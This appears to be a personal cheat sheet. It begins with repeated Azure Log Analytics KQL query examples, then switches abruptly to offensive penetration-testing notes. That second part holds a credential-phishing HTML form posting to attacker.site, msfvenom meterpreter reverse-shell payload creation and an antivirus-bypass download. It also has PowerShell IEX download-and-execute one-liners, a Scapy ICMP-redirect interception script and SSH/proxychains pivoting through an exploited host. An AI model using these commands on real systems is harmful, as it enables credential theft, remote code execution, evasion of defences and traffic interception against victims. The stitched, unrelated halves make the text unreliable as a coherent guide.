Returns the number of rows
Perf
| where TimeGenerated >= ago(1h)
and CounterName == "Bytes Received/sec"
and CounterValue > 0
| count
Returns the number of rows
Perf
| where TimeGenerated >= ago(1h)
and CounterName == "Bytes Received/sec"
and CounterValue > 0
| count
Take takes a random amount of record from the date set
Perf
| where TimeGenerated >= ago(1h)
and CounterName == "Bytes Received/sec"
and CounterValue > 0
| take 5
Limit is the same and can be used to limit the amount of records returned
Perf
| where TimeGenerated >= ago(1h)
and CounterName == "Bytes Received/sec"
and CounterValue > 0
| limit 5
Where limits the result set
Search Table for data generated since a 1 hour ago
Perf
| where TimeGenerated >= ago(1h)
ago allows you to select relative date ranges
Combine where with AND statement
Perf
| where TimeGenerated >= ago(1h)
and CounterName == "Bytes Received/sec"
and CounterValue > 0
Combine where with OR statement
Perf
| where TimeGenerated >= ago(1h)
and (CounterName == "Bytes Received/sec"
or
CounterName == "% Processor Time"
)
and CounterValue > 0
Stacking where operators (useful for in between processing (if/else etc.)
Perf
| where TimeGenerated >= ago(1h)
| where (CounterName == "Bytes Received/sec"
or
CounterName == "% Processor Time"
)
| where CounterValue > 0
Simulate search with where command
//Search any column for string containing Bytes
Perf
| where * has "Bytes"
//Search any column that starts with the string Bytes
Perf
| where * hasprefix "Bytes"
//Search any column that ends with the string Bytes
Perf
| where * hassuffix "Bytes"
//Search any column that contains with the string Bytes
Perf
| where * contains "Bytes"
//Search any string in a column using regex
Perf
| where InstanceName matches regex "[A-Z]:"
String search through all tables (do not use in production!)
search "memory"
Limit string search to a specific range of tables
search in (Perf, Events) "memory"
Limit string search to one table
Perf| search "memory"
Search for exact string "Available MBytes
"
Perf | search CounterName == "Available MBytes"
Search for string in column that contains MBytes
Perf | search CounterName:"MBytes"
Search for string in all columns containing string Bytes
Perf | search "Bytes"
Search for string in all columns starting with Bytes
Perf | search * startswith "Bytes"
Search for string in all columns ending with Bytes
Perf | search * endswith "Bytes"
Search for string in all columns that starts with Free and ends with Bytes
Perf | search "Free*bytes"
Search for string in all columns that starts with Free and ends with Bytes that contain either C: or D:
Perf | search "Free*bytes" and ("C:" or "D:")
Search table column for string using regex
Perf
| search InstanceName matches regex "[A-Z]:"
wmic service get name,displayname,pathname,startmode | findstr /I “auto” | findstr /I /v “c:\windows\” | findstr /i /v “””
Start nectat listener
ncat -lvp 4444
Start ngrok to make url accessible
./ngrok http 4444
Send page to users:
<b>Login required</b><br><br><b>ENTER Credentials:<br><br><form action=”http://attacker.site” method=”GET”><input type=”text” name=”email” placeholder=”Your Username”><br><input type=”password” name=”password”><br><input type=”submit” value=”Submit”></form>
1. create MSFVENOM
msfvenom -p windows/x64/meterpreter/reverse_https -f psh LHOST=10.10.20.142 LPORT=443 > ‘/home/kali/http/https2.ps1’
2. copy raw from https://github.com/aloksaurabh/OffenPowerSh/tree/master/Bypass
curl https://raw.githubusercontent.com/aloksaurabh/OffenPowerSh/master/Bypass/Invoke-AlokS-AvBypass.ps1 > demo.ps1
3. python2 -m SimpleHTTPServer 80
4. IEX (New-Object Net.WebClient).DownloadString(‘http://10.10.20.142/demo.ps1’);Invoke-AlokS-AvBypass
5. IEX (New-Object Net.WebClient).DownloadString(‘http://10.10.20.142/https2.ps1’)
Enable IP forwarding and Source NAT translation for Victim subnet
#sudo echo 1 > /proc/sys/net/ipv4/ip_forward #sudo iptables -t nat -A POSTROUTING -s 10.100.13.0/255.255.255.0 -o tap0 -j MASQUERADE
#sudo iptables --append FORWARD --in-interface eth0 -j ACCEPT (only for traffic forward)
#sudo iptables -t nat -L
Scapy create ICMP-Redirect packet (type=5) for a better gateway to destination 10.23.56.100
>>> ip=IP() >>> ip.src='10.100.13.1' >>> ip.dst='10.100.13.126' >>> ip.display bound method IP.display of IP src=10.100.13.1 dst=10.100.13.126 |>> >>> icmp=ICMP() >>> icmp.type=5 >>> icmp.code=1 >>> icmp.gw='10.100.13.20' >>> icmp.display bound method ICMP.display of > >>> ip2=IP() >>> ip2.src='10.100.13.126' >>> ip2.dst='10.23.56.100' >>> ip2.display bound method IP.display of IP src=10.100.13.126 dst=10.23.56.100 |>>
# Creating and sending ICMP redirect packets originalRouterIP='10.100.13.1' attackerIP='10.100.13.20' victimIP='10.100.13.126' serverIP='10.23.56.100' # We create an ICMP Redirect packet ip=IP() ip.src=originalRouterIP ip.dst=victimIP icmpRedirect=ICMP() icmpRedirect.type=5 icmpRedirect.code=1 icmpRedirect.gw=attackerIP # The ICMP packet payload /should/ contain the original TCP SYN packet # sent from the victim Ip redirPayloadIP=IP() redirPayloadIP.src=victimIP redirPayloadIP.dst=serverIP fakeOriginalTCPSYN=TCP() fakeOriginalTCPSYN.flags="S" fakeOriginalTCPSYN.dport=80 fakeOriginalTCPSYN.seq=444444444 fakeOriginalTCPSYN.sport=55555 while True:send(ip/icmpRedirect/redirPayloadIP/fakeOriginalTCPSYN) # Press <enter>
Listen local port 9999 to forward traffic to target rdp using SSH tunnel of exploited host
ssh -L 9999:10.10.20.140:3389 msx@192.168.68.117
Use Proxychain to route traffic through exploited host
ssh -D 127.0.0.1:1090 msx@192.168.68.117
Usage example nmap scan
proxychains nmap -sT -v 10.10.20.140
proxychains nmap -sT -PN -n -sV -p 80,443,21,22 10.10.20.129 proxychains nmap -sTV -n -PN -p 21 10.10.51.21